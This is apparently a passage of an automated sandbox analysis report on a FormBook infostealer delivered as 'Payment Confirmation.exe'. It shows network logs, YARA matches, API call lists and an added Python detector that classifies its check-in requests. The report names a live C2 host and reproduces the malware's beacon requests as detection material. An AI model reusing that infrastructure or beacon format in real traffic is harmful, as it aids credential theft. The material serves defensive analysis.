Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Pragma: no-cache | Content-Type: text/html | Content-Length: 1237 | Date: Wed, 13 Oct 2021 14:32:26 GMT | Server: LiteSpeed | Vary: User-Agent | Data Raw (truncated in the report): 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 14:32:42 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f93b1-113" | Via: 1.1 google | Connection: close | Data Raw and Data Ascii: identical to the 14:32:21 response above
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 14:33:00 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f93b1-113" | Via: 1.1 google | Connection: close | Data Raw and Data Ascii: identical to the 14:32:21 response above
Source: Payment Confirmation.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Payment Confirmation.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmp | String found in binary or memory: http://www.litespeedtech.com/error-page
Source: unknown | DNS traffic detected: queries for: www.playstarexch.com
Source: global traffic | HTTP traffic detected: the ten GET /b2c0/ requests listed above (none carries a User-Agent header)
Source: Payment Confirmation.exe, 00000001.00000002.366842319.00000000007FA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
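
Every check-in request above has the same shape: a GET to the path `/b2c0/` that also appears in the configured C2 URL, exactly two query parameters, only Host and Connection headers (no User-Agent), seven NUL bytes after the headers, and a different Host each time, the configured C2 once and otherwise a `www.`-prefixed domain from the decoy list. The Python below is an added example, not Joe Sandbox or Emerging Threats logic: it turns the extracted configuration into a host list and classifies raw HTTP requests against that list and those traits. The configuration is the one extracted above with the decoy list shortened; the first two requests are constructed from lines above and the third is a benign control request that should not be flagged. The `www.` prefix on decoys is taken from the DNS queries the report shows explorer.exe making, and the trait threshold for unknown hosts is this example's own choice.

```python
"""Classify HTTP requests against the FormBook configuration in this report.

Added example; not Joe Sandbox or Snort/ET logic. The configuration is the one
extracted in the report (decoy list shortened); the requests are constructed
from the report's traffic plus one benign control request.
"""
import json
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Subset of the Malware Configuration section: the full C2 list, five decoys.
CONFIG = json.loads("""{
  "C2 list": ["www.thesewhitevvalls.com/b2c0/"],
  "decoy": ["playstarexch.com", "anadolu.academy", "altitudebc.com",
            "elliotpioneer.com", "lumberjackguitarloops.com"]
}""")

# Constructed from two request lines in the report (the seven 00 bytes are the
# "Data Raw" shown after the headers) plus a benign control request.
CHECKIN_DECOY = (
    b"GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1\r\n"
    b"Host: www.playstarexch.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7)
CHECKIN_C2 = (
    b"GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1\r\n"
    b"Host: www.thesewhitevvalls.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7)
BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n")


def config_hosts(cfg: Dict) -> Dict[str, str]:
    """Map host -> role. The C2 entry is host/path; decoys are bare domains that
    the sample queried with a 'www.' prefix (see the DNS queries above), so
    both forms are indexed."""
    hosts: Dict[str, str] = {}
    for url in cfg["C2 list"]:
        hosts[urlsplit("http://" + url).hostname] = "c2"
    for dom in cfg["decoy"]:
        hosts.setdefault(dom, "decoy")
        hosts.setdefault("www." + dom, "decoy")
    return hosts


def c2_paths(cfg: Dict) -> set:
    return {urlsplit("http://" + url).path for url in cfg["C2 list"]}


def parse_request(raw: bytes) -> Dict:
    """Minimal HTTP/1.1 request parser: request line, headers, trailing bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def classify(raw: bytes, cfg: Dict) -> Optional[Dict]:
    """None when nothing is suspicious; otherwise host, role and traits seen."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    url = urlsplit(req["target"])
    params = parse_qsl(url.query, keep_blank_values=True)
    traits: List[str] = []
    if url.path in c2_paths(cfg):
        traits.append("path_equals_config_c2_path")
    if "user-agent" not in req["headers"]:
        traits.append("no_user_agent")
    if len(params) == 2:
        traits.append("two_query_params")
    if req["method"] == "GET" and req["body"]:
        traits.append("body_on_get")
    role = config_hosts(cfg).get(host)
    # A configured host is a hit on its own; an unknown host needs the
    # behavioural traits to line up (threshold is this example's choice).
    if role is None and len(traits) < 3:
        return None
    return {"host": host, "role": role or "unknown", "traits": traits}


if __name__ == "__main__":
    for raw in (CHECKIN_DECOY, CHECKIN_C2, BENIGN):
        print(classify(raw, CONFIG))
```

The role field matters for triage: a decoy hit means the infected host generated the traffic, but the decoy operator is an unrelated, usually legitimate site (the 403/404 responses above are what such sites answered), so only the `c2` host belongs on a block list as infrastructure.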

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same six UNPACKEDPE and ten MEMORY sources listed under AV Detection above

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Payment Confirmation.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: Payment Confirmation.exe | Static file information: Suspicious name
          Source: Payment Confirmation.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_004047D3
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_004061D4
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10008856
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10003D10
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10011101
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1000F922
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_100119CC
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_100059D1
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1001AA08
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1001AA17
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1000B25E
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1000FE94
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10005EC5
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_100062DD
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10006712
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_10006B47
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_1000F3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_00401030
